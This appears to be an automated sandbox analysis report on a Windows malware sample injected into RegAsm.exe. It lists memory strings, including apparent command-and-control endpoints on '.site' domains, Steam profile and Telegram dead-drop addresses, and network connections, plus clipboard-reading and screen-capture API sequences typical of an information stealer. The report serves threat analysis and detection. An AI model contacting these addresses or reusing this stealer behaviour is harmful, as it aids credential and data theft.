                          Source: BAKEBA.3.drString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
                          Source: RegAsm.exe, 00000003.00000002.2815544613.0000000020883000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2818900138.00000000267FC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2830673397.000000003E5BC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2824836690.00000000326DC000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: https://mozilla.org0/
                          Source: RegAsm.exe, 0000000A.00000002.2868690802.0000000000BBE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mysterisop.site/api
                          Source: RegAsm.exe, 0000000A.00000002.2868690802.0000000000BEE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mysterisop.site/pi
                          Source: RegAsm.exe, 0000000A.00000002.2868690802.0000000000BAE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://snarlypagowo.site/
                          Source: RegAsm.exe, 0000000A.00000002.2868690802.0000000000BEE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://soldiefieop.site/api
                          Source: 76561199780418869[1].htm.3.drString found in binary or memory: https://steamcommunity.com/
                          Source: RegAsm.exe, 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
                          Source: RegAsm.exe, 0000000A.00000002.2868690802.0000000000BBE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/M:
                          Source: RegAsm.exe, 00000003.00000002.2803671443.00000000012A3000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://steamcommunity.com/discussions/
                          Source: RegAsm.exe, 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
                          Source: 76561199780418869[1].htm.3.drString found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199780418869
                          Source: RegAsm.exe, 00000003.00000002.2803671443.00000000012A3000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://steamcommunity.com/market/
                          Source: RegAsm.exe, 00000003.00000002.2803671443.00000000012A3000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://steamcommunity.com/my/wishlist/
                          Source: RegAsm.exe, 0000000A.00000002.2868690802.0000000000BBE000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2868690802.0000000000BEE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900
                          Source: RegAsm.exe, 0000000A.00000002.2868690802.0000000000BBE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900085;
                          Source: file.exe, 00000000.00000002.2144562432.0000000004195000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, RegAsm.exe, 00000003.00000002.2803671443.0000000001285000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2801902141.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199780418869
                          Source: RegAsm.exe, 00000003.00000002.2803671443.00000000012A3000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://steamcommunity.com/profiles/76561199780418869/badges
                          Source: RegAsm.exe, 00000003.00000002.2803671443.00000000012A3000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://steamcommunity.com/profiles/76561199780418869/inventory/
                          Source: file.exe, 00000000.00000002.2144562432.0000000004195000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2801902141.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199780418869u55uhttps://t.me/ae5edMozilla/5.0
                          Source: RegAsm.exe, 00000003.00000002.2803671443.00000000012A3000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://steamcommunity.com/workshop/
                          Source: 76561199780418869[1].htm.3.drString found in binary or memory: https://store.steampowered.com/
                          Source: 76561199780418869[1].htm.3.drString found in binary or memory: https://store.steampowered.com/about/
                          Source: RegAsm.exe, 00000003.00000002.2803671443.00000000012A3000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://store.steampowered.com/explore/
                          Source: RegAsm.exe, 00000003.00000002.2803671443.00000000012A3000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://store.steampowered.com/legal/
                          Source: RegAsm.exe, 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://store.steampowered.com/mobile
                          Source: RegAsm.exe, 00000003.00000002.2803671443.00000000012A3000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://store.steampowered.com/news/
                          Source: RegAsm.exe, 00000003.00000002.2803671443.00000000012A3000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://store.steampowered.com/points/shop/
                          Source: RegAsm.exe, 00000003.00000002.2803671443.00000000012A3000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://store.steampowered.com/privacy_agreement/
                          Source: RegAsm.exe, 00000003.00000002.2803671443.00000000012A3000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://store.steampowered.com/stats/
                          Source: RegAsm.exe, 00000003.00000002.2803671443.00000000012A3000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://store.steampowered.com/steam_refunds/
                          Source: RegAsm.exe, 00000003.00000002.2803671443.00000000012A3000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://store.steampowered.com/subscriber_agreement/
                          Source: DAKJDH.3.drString found in binary or memory: https://support.mozilla.org
                          Source: DAKJDH.3.drString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                          Source: DAKJDH.3.drString found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.ZAnPVwXvBbYt
                          Source: file.exe, 00000000.00000002.2144562432.0000000004195000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, RegAsm.exe, 00000003.00000002.2801902141.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://t.me/ae5ed
                          Source: RegAsm.exe, 0000000A.00000002.2868690802.0000000000BEE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://treatynreit.site/api
                          Source: RegAsm.exe, 0000000A.00000002.2868690802.0000000000BEE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://treatynreit.site/apiG
                          Source: RegAsm.exe, 00000003.00000002.2803671443.0000000001354000.00000004.00000020.00020000.00000000.sdmp, BAKEBA.3.drString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_86277c656a4bd7d619968160e91c45fd066919bb3bd119b3
                          Source: RegAsm.exe, 00000003.00000002.2815544613.0000000020883000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2818900138.00000000267FC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2830673397.000000003E5BC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2824836690.00000000326DC000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: https://www.digicert.com/CPS0
                          Source: CAAKFI.3.drString found in binary or memory: https://www.ecosia.org/newtab/
                          Source: file.exe, 66fe13d251bbf_lsod[1].exe.3.dr, ECBKKKFHCF.exe.3.drString found in binary or memory: https://www.entrust.net/rpa0
                          Source: CAAKFI.3.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                          Source: DAKJDH.3.drString found in binary or memory: https://www.mozilla.org
                          Source: DAKJDH.3.drString found in binary or memory: https://www.mozilla.org#
                          Source: RegAsm.exe, 00000003.00000002.2809067446.0000000019DBC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/
                          Source: DAKJDH.3.drString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.bwSC1pmG_zle
                          Source: RegAsm.exe, 00000003.00000002.2809067446.0000000019DBC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/
                          Source: DAKJDH.3.drString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.hjKdHaZH-dbQ
                          Source: DAKJDH.3.drString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                          Source: RegAsm.exe, 00000003.00000002.2803671443.0000000001354000.00000004.00000020.00020000.00000000.sdmp, BAKEBA.3.drString found in binary or memory: https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_
                          Source: RegAsm.exe, 00000003.00000002.2803671443.00000000012A3000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
                          Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.6:49720 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 49.12.197.9:443 -> 192.168.2.6:49721 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 172.67.208.141:443 -> 192.168.2.6:49747 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49748 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 172.67.152.190:443 -> 192.168.2.6:49750 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 104.21.84.18:443 -> 192.168.2.6:49752 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 104.21.18.193:443 -> 192.168.2.6:49753 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 104.21.21.3:443 -> 192.168.2.6:49754 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 104.21.17.174:443 -> 192.168.2.6:49755 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.6:49756 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 104.21.16.12:443 -> 192.168.2.6:49757 version: TLS 1.2
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_00438660 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,10_2_00438660
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_00438660 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,10_2_00438660
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00411F55 CreateStreamOnHGlobal,GetDesktopWindow,GetWindowRect,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,GetHGlobalFromStream,GlobalLock,GlobalSize,SelectObject,DeleteObject,DeleteObject,ReleaseDC,CloseWindow,3_2_00411F55

                          System Summary

                          barindex
                          .NET source code contains very large array initializations
                          Source: file.exe, MoveAngles.csLarge array initialization: MoveAngles: array initializer size 393216
                          Source: ECBKKKFHCF.exe.3.dr, MoveAngles.csLarge array initialization: MoveAngles: array initializer size 360448
                          Source: 66fe13d251bbf_lsod[1].exe.3.dr, MoveAngles.csLarge array initialization: MoveAngles: array initializer size 360448
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0040145B GetCurrentProcess,NtQueryInformationProcess,3_2_0040145B
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C66B700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,3_2_6C66B700
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C66B8C0 rand_s,NtQueryVirtualMemory,3_2_6C66B8C0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C66B910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError,3_2_6C66B910
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C60F280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,3_2_6C60F280
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0041C4723_2_0041C472
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0042D9333_2_0042D933
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0042D1C33_2_0042D1C3
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0042D5613_2_0042D561
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0041950A3_2_0041950A
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0042DD1B3_2_0042DD1B
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0042CD2E3_2_0042CD2E
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0041B7123_2_0041B712
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C6035A03_2_6C6035A0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C6154403_2_6C615440
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C67545C3_2_6C67545C
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C67542B3_2_6C67542B
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C67AC003_2_6C67AC00
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C645C103_2_6C645C10
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C652C103_2_6C652C10
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C60D4E03_2_6C60D4E0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C646CF03_2_6C646CF0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C6164C03_2_6C6164C0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C62D4D03_2_6C62D4D0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C6634A03_2_6C6634A0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C66C4A03_2_6C66C4A0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C616C803_2_6C616C80
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C61FD003_2_6C61FD00
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C6305123_2_6C630512
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C62ED103_2_6C62ED10
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C6685F03_2_6C6685F0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C640DD03_2_6C640DD0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C676E633_2_6C676E63
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C60C6703_2_6C60C670
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C6246403_2_6C624640
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C652E4E3_2_6C652E4E
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C629E503_2_6C629E50
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C643E503_2_6C643E50
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C669E303_2_6C669E30
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C6556003_2_6C655600
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C647E103_2_6C647E10
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C6776E33_2_6C6776E3
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C60BEF03_2_6C60BEF0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C61FEF03_2_6C61FEF0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C664EA03_2_6C664EA0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C66E6803_2_6C66E680
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C625E903_2_6C625E90
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C619F003_2_6C619F00
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C6477103_2_6C647710
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C60DFE03_2_6C60DFE0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C636FF03_2_6C636FF0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C6577A03_2_6C6577A0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C64F0703_2_6C64F070
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C6288503_2_6C628850
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C62D8503_2_6C62D850
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C64B8203_2_6C64B820
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C6548203_2_6C654820
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C6178103_2_6C617810
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C62C0E03_2_6C62C0E0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C6458E03_2_6C6458E0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C6750C73_2_6C6750C7
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C6360A03_2_6C6360A0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C61D9603_2_6C61D960
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C65B9703_2_6C65B970
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C67B1703_2_6C67B170
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C62A9403_2_6C62A940
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C60C9A03_2_6C60C9A0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C63D9B03_2_6C63D9B0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C6451903_2_6C645190
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C6629903_2_6C662990
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C649A603_2_6C649A60
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C621AF03_2_6C621AF0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C64E2F03_2_6C64E2F0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C648AC03_2_6C648AC0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C6022A03_2_6C6022A0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C634AA03_2_6C634AA0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C61CAB03_2_6C61CAB0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C672AB03_2_6C672AB0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C67BA903_2_6C67BA90
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C61C3703_2_6C61C370
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C6053403_2_6C605340
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C64D3203_2_6C64D320
